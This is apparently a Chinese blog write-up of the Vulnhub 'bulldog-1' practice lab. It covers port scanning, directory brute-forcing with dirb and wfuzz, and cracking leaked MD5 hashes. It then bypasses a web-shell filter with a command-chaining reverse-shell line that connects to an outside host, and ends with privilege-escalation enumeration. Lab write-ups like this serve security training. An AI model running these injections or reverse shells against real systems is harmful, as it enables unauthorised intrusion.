• 【甄选靶场】Vulnhub百个项目渗透——45、项目四十五:bulldog-1(waf绕过)


    Vulnhub百个项目渗透

    Vulnhub百个项目渗透——项目四十五:bulldog-1(waf绕过


    🔥系列专栏:Vulnhub百个项目渗透
    🎉欢迎关注🔎点赞👍收藏⭐️留言📝
    📆首发时间:🌴2022年10月21日🌴
    🍭作者水平很有限,如果发现错误,还望告知,感谢!


    前言

    本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。


    信息收集

    
    23/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 208bfc9ed92e28226b2e0ee372c5bb52 (RSA)
    |   256 cdbd45d85ce48cb691e539a966cbd798 (ECDSA)
    |_  256 2fbad5e59fa243e53b242c10c20ada66 (ED25519)
    80/tcp   open  http    WSGIServer 0.1 (Python 2.7.12)
    |_http-title: Bulldog Industries
    8080/tcp open  http    WSGIServer 0.1 (Python 2.7.12)
    |_http-title: Bulldog Industries
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10

    只发现了ssh以及web
    访问web查看一下

    发现了页面信息中有这么一个人名
    Winston Churchy

    还有一段话,可能是说存在脏牛的漏洞
    clam shell and a smelly cow?

    还有一张图片
    进行一下分析
    在这里插入图片描述

    发现并没有任何的信息
    接下来爆破一下目录
    使用dirb的默认爆破即可

    dirb http://192.168.3.140
    
    • 1

    在这里插入图片描述在这里插入图片描述发现了几个目录。admin.dev.login
    接下来看看有没有有价值的信息
    在这里插入图片描述
    在这里插入图片描述

    在这里插入图片描述

    请向服务器验证以使用Web Shell

    在这里插入图片描述但是弱口令无效

    接着在dev目录源码发现了几个md5
    hashcat没搞出来。somd5可以

    在这里插入图片描述在这里插入图片描述

    在这里插入图片描述

    因为这个web服务是基于python的,所以我是用wfuzz再次爆破一下这几个可能会存在东西的后缀

    wfuzz -c --hc=400,404 -z file,/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt http://192.168.3.139/FUZZ.php,py,txt,html
    
    • 1

    在这里插入图片描述
    总结一下我们搜集到的所有信息

    脏牛
    mongodb
    存在ssh,也存在webshell,但wenshell开放的时候就会关闭ssh
    django的cms
    
    还包含这么几个用户:
    Churchy---Winston Churchy
    brooke--Alan Brooke
    alan
    william
    malik
    kevin
    ashley
    nick    bulldog
    sarah    bulldoglover
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15

    在得到了两个用户的密码之后
    我们登陆后台,却发现没有任何东西可以干,于是我们尝试登陆ssh,但是发现ssh已经关闭了,这个时候就应该想到“存在ssh,也存在webshell,但wenshell开放的时候就会关闭ssh”这句话,于是我们回到刚才webshell的界面,发现存在waf

    waf绕过

    在这里插入图片描述在这里插入图片描述

    ls &&echo "bash -i >& /dev/tcp/192.168.4.251/1234 0>&1" | bash
    
    • 1

    本地开端口接着
    在这里插入图片描述在这里插入图片描述上传linpeas.sh跑,然后手工跑

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    find / -perm 777 -type f 2>/dev/null
    find / -perm -4000 -type f 2>/dev/null 
    find / -user bulldogadmin 2>&1 | grep -v "Permission denied\|proc"
    
    • 1
    • 2
    • 3

    sudo -l提示我们没有tty
    那就

    python -c 'import pty;pty.spawn ("/bin/nash")'
    
    • 1

    但是再sudo -l需要密码,我们继续寻找
    在这里插入图片描述下面这个是bulldogadmin的拥有权限文件
    在这里插入图片描述最终在bulldogadmin用户的权限文件中找到了这么一段话
    在这里插入图片描述所以突破点就在那个文件中,我们先看一下文件类型,并且strings看一下
    发现了这一串字符
    大写的h是换行,把这几行拼接起来就能构成一个密码

    在这里插入图片描述
    在这里插入图片描述

  • 相关阅读:
    YOLOv8独家改进:逐元素乘法(star operation)二次创新 | 微软新作StarNet:超强轻量级Backbone CVPR 2024
    猿创征文 | Spring框架【管理对象(IOC详解)】
    MySQL的存储过程
    手写Spring-第十章-让我看看!基于观察者模式的事件机制
    leetcode/字符串中的所有变位词(s1字符串的某个排列是s2的子串)的左索引
    【DOCKER】
    2023秋招—大数据开发面经—联友科技
    15个Java线程并发面试题和答案
    Spark 之 WholeStageCodegen
    开放签开源电子签章白皮书-简版
  • 原文地址:https://blog.csdn.net/weixin_65527369/article/details/127437236